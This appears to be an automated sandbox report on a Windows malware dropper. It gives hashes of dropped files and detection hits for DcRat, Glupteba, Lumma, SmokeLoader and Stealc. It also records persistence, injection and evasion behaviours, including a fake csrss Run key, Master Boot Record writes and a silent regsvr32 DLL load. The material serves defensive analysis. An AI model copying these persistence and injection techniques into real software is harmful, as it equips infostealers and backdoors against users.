\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 6e94be834388b59641369a604bd1b79c
SHA1 7a1cddd9a66c151f33d89d925c29e33ce774756e
SHA256 98dddaa1f0cee8eda930283954a5e74c6d35b6ed9b4733a9e2cfe384ab6450d3
SHA512 89c769a1e46bb20746c8b99bc8a2752f39353455f4bda7a03780069002a2edbf4ee8803d493bb5991feaac6f364703cfd4d41064f6140cc65c632b89b960becf

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 f0ff5f372a958f41fa51da9c9f03c8b2
SHA1 06d46a56e5bc97c19dd5fb7195e973121b641c55
SHA256 d2ed2c2940a1994e68fb473cf5e7c0ab0487d38ea141f35c0f6c07230e7e868b
SHA512 8ebc3a3acd0f9139707f0681f85457ffdaba8f6532bb7d28a196be05a0bf04692ffff4c0cf0a712897068c395e3f5aa64c799fd9cffc810b0139cb7d778e8424

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 a837dd9f2d58bb7770c279d11473279b
SHA1 a820ce4052fe0f6769ffcc06ebf96fd7c4dcca03
SHA256 1935d60a54e51758585703483f2706fb9cb8721b84e48ae9bd0542accf7d87e5
SHA512 0bbd7c115d361f7ab56beb3277514c548e7dcd835a8e55cab79c09bac050c3ea0b9eeb3031fb47165d90ff9df5338b5a17b30964ef93630e65f13f3ee8ab6044

\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 b03886cb64c04b828b6ec1b2487df4a4
SHA1 a7b9a99950429611931664950932f0e5525294a4
SHA256 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc
SHA512 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 5e94f0f6265f9e8b2f706f1d46bbd39e
SHA1 d0189cba430f5eea07efe1ab4f89adf5ae2453db
SHA256 50a46b3120da828502ef0caba15defbad004a3adb88e6eacf1f9604572e2d503
SHA512 473dfa66a36feed9b29a43245074141478327ce22ba7cce512599379dcb783b4d665e2d65c5e9750b988c7ed8f6c3349a7a12d4b8b57c89840eee6ca6e1a30cd

\Users\Admin\AppData\Local\Temp\nsjC350.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

memory/2612-346-0x00000000730D0000-0x00000000737BE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 d122f827c4fc73f9a06d7f6f2d08cd95
SHA1 cd1d1dc2c79c0ee394b72efc264cfd54d96e1ee5
SHA256 b7a6dcfdd64173ecbcef562fd74aee07f3639fa863bd5740c7e72ddc0592b4fc
SHA512 8755979d7383d6cb5e7d63798c9ca8b9c0faeec1fe81907fc75bbbb7be6754ab7b5a09a98492a27f90e3f26951b6891c43d8acd21414fb603cd86a4e10dac986

C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp

MD5 a28dacaf0cbbf1492125a80597ee1315
SHA1 a89f610af8cbe1944c770a8f7792b56234d98042
SHA256 88b1beec7215b7d1201b6dedd2d9a12df840da9d45a4c115b4e28775d7e742e1
SHA512 82e8239786bcc5dd95cd4a1366ef557c83ed4b9dfb5f70971cb199c305fc2e868dcb1dc72e74f3de156d7bf466118708275593ade4ea8dda1ffb8539e0e4f88e

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

memory/2640-372-0x0000000004AC0000-0x0000000004C77000-memory.dmp

memory/2980-427-0x000000007756F000-0x0000000077570000-memory.dmp

memory/2980-428-0x0000000077570000-0x0000000077571000-memory.dmp

memory/2980-429-0x00000000008E0000-0x00000000008E1000-memory.dmp

memory/2672-430-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2448-431-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2476-432-0x0000000002560000-0x0000000002958000-memory.dmp

memory/2648-433-0x0000000000250000-0x0000000000251000-memory.dmp

memory/2476-434-0x0000000002960000-0x000000000324B000-memory.dmp

memory/2476-435-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1224-442-0x0000000000400000-0x0000000000848000-memory.dmp

memory/1932-441-0x0000000000400000-0x0000000000822000-memory.dmp

memory/1932-440-0x0000000000220000-0x0000000000254000-memory.dmp

memory/1932-436-0x0000000000920000-0x0000000000A20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 1b80fb22665c5c506faadcc5f2a4cd7f
SHA1 80b615e0ae9ea791b521d802f3d1f8480af6380f
SHA256 02d595587af4a8fe7aa6c44f6b1cba48f21725b83de6ee5aa31e2a9f6ff85a93
SHA512 ded746797b1d0a80ab456024011bc4b0ca30d05959227b0baaca920e9504a92a11a4ab70fbd1b096b55673ea0941f7151708d1ca6595889a6e7666d405ba88a0

memory/2476-452-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1224-460-0x0000000000400000-0x0000000000848000-memory.dmp

memory/2832-464-0x0000000003110000-0x0000000003446000-memory.dmp

memory/2572-465-0x0000000002810000-0x0000000002C08000-memory.dmp

memory/2572-466-0x0000000002C10000-0x00000000034FB000-memory.dmp

memory/2572-467-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2132-468-0x0000000000400000-0x0000000000736000-memory.dmp

\ProgramData\nss3.dll

MD5 1d82785a31ff1daa68547dbcf420e953
SHA1 63e6973b9d0eb4edd402541b6c5411de96c5617f
SHA256 7f60ece436bf9d9abc72a3747992bc7d266a031c4c93e0a06ac205d7b1a7f559
SHA512 3852488cdcb0dd1f185a9d2aeb90b0e4f7615ed8035346b6e861e8aa9f6ae3f8b4682b30d5c235c6c9159e4b0d5370ab2a4ff613630dccc7c17e9d15f7709c9f

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2132-483-0x0000000002760000-0x0000000002802000-memory.dmp

\Windows\rss\csrss.exe

MD5 dd76b1ea2a8bf2f7e800e0a11f01f5e9
SHA1 d31c1ff5b3bfff45af20f5fce0579b80819c5390
SHA256 98ddd0a4e39f3693a0bdda3844934a3211e119eee2d5155e17778b0af18e6b89
SHA512 2b3118524ede04678a6306af55dff202a5dbd1a5443bd815dc6a7e3122518ca3593841b942b46b04c3053e553cf20c8baca39461f27cc7fe5d293e26050b2508

memory/2572-499-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2132-508-0x0000000000400000-0x0000000000736000-memory.dmp

memory/2856-509-0x0000000002650000-0x0000000002A48000-memory.dmp

memory/1932-514-0x0000000000920000-0x0000000000A20000-memory.dmp

memory/1932-516-0x0000000000400000-0x0000000000822000-memory.dmp

memory/2856-519-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1932-532-0x0000000000400000-0x0000000000822000-memory.dmp

memory/1616-538-0x000000001B130000-0x000000001B412000-memory.dmp

memory/1616-539-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/1616-540-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/1616-543-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/1616-544-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/1616-545-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/1616-546-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/1616-547-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 bb48f32ec35fa74ad3c24a668a2088c1
SHA1 de7c993fcf955f6173985e72b67ea68602068999
SHA256 0a4a3937e1a5777cb37d7296b09d6d33aa9588a3eccea96ace33ec42c5acac9c
SHA512 f1923f9e7b2c64fd4658967370dfe85b3a65d54eed967ff41ab3a5d70276c93530bac0e514038bb20a43af2a5efd5f1e8323af6110aa12fdec1d8828a3f0b9d8

C:\Users\Admin\AppData\Local\Temp\Cab908E.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar918B.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-22 06:18

Reported

2024-02-22 06:21

Platform

win10v2004-20240221-en

Max time kernel

67s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe"

Signatures

DcRat

rat infostealer dcrat

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Detects Windows executables referencing non-Windows User-Agents

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables Discord URL observed in first stage droppers

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables containing artifacts associated with disabling Widnows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables packed with VMProtect.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many varying, potentially fake Windows User-Agents

Description Indicator Process Target
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\D562.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\8FBC.exe N/A

Checks installed software on the system

discovery

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\6F31.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2660 set thread context of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\E31F.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\E31F.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\E31F.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3428 wrote to memory of 4972 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3428 wrote to memory of 4972 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4972 wrote to memory of 3136 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4972 wrote to memory of 3136 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4972 wrote to memory of 3136 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3428 wrote to memory of 4968 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F31.exe
PID 3428 wrote to memory of 4968 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F31.exe
PID 3428 wrote to memory of 4968 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F31.exe
PID 3428 wrote to memory of 4552 N/A N/A C:\Users\Admin\AppData\Local\Temp\7D7A.exe
PID 3428 wrote to memory of 4552 N/A N/A C:\Users\Admin\AppData\Local\Temp\7D7A.exe
PID 3428 wrote to memory of 4552 N/A N/A C:\Users\Admin\AppData\Local\Temp\7D7A.exe
PID 3428 wrote to memory of 2304 N/A N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe
PID 3428 wrote to memory of 2304 N/A N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe
PID 3428 wrote to memory of 2304 N/A N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe
PID 3428 wrote to memory of 2660 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 3428 wrote to memory of 2660 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 3428 wrote to memory of 2660 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2304 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp
PID 2304 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp
PID 2304 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\89C0.exe C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp
PID 3428 wrote to memory of 2240 N/A N/A C:\Users\Admin\AppData\Local\Temp\922E.exe
PID 3428 wrote to memory of 2240 N/A N/A C:\Users\Admin\AppData\Local\Temp\922E.exe
PID 3428 wrote to memory of 2240 N/A N/A C:\Users\Admin\AppData\Local\Temp\922E.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 2660 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\8FBC.exe C:\Users\Admin\AppData\Local\Temp\8FBC.exe
PID 1436 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1436 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 3428 wrote to memory of 1460 N/A N/A C:\Users\Admin\AppData\Local\Temp\D562.exe
PID 3428 wrote to memory of 1460 N/A N/A C:\Users\Admin\AppData\Local\Temp\D562.exe
PID 3428 wrote to memory of 1460 N/A N/A C:\Users\Admin\AppData\Local\Temp\D562.exe
PID 3428 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\E31F.exe
PID 3428 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\E31F.exe
PID 3428 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\E31F.exe
PID 1460 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1460 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1460 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1460 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1460 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1460 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1460 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1460 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\D562.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1904 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1904 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1904 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1904 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp
PID 1904 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp
PID 1904 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp
PID 3428 wrote to memory of 2944 N/A N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe
PID 3428 wrote to memory of 2944 N/A N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe
PID 3428 wrote to memory of 2944 N/A N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe
PID 2944 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp
PID 2944 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp
PID 2944 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\F86D.exe C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp
PID 2612 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe

"C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\6D3C.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\6D3C.dll

C:\Users\Admin\AppData\Local\Temp\6F31.exe

C:\Users\Admin\AppData\Local\Temp\6F31.exe

C:\Users\Admin\AppData\Local\Temp\7D7A.exe

C:\Users\Admin\AppData\Local\Temp\7D7A.exe

C:\Users\Admin\AppData\Local\Temp\89C0.exe

C:\Users\Admin\AppData\Local\Temp\89C0.exe

C:\Users\Admin\AppData\Local\Temp\8FBC.exe

C:\Users\Admin\AppData\Local\Temp\8FBC.exe

C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CHGV8.tmp\89C0.tmp" /SL5="$90246,3536428,54272,C:\Users\Admin\AppData\Local\Temp\89C0.exe"

C:\Users\Admin\AppData\Local\Temp\922E.exe

C:\Users\Admin\AppData\Local\Temp\922E.exe

C:\Users\Admin\AppData\Local\Temp\8FBC.exe

C:\Users\Admin\AppData\Local\Temp\8FBC.exe

C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe

"C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe" -i

C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe

"C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe" -s

C:\Users\Admin\AppData\Local\Temp\D562.exe

C:\Users\Admin\AppData\Local\Temp\D562.exe

C:\Users\Admin\AppData\Local\Temp\E31F.exe

C:\Users\Admin\AppData\Local\Temp\E31F.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\F86D.exe

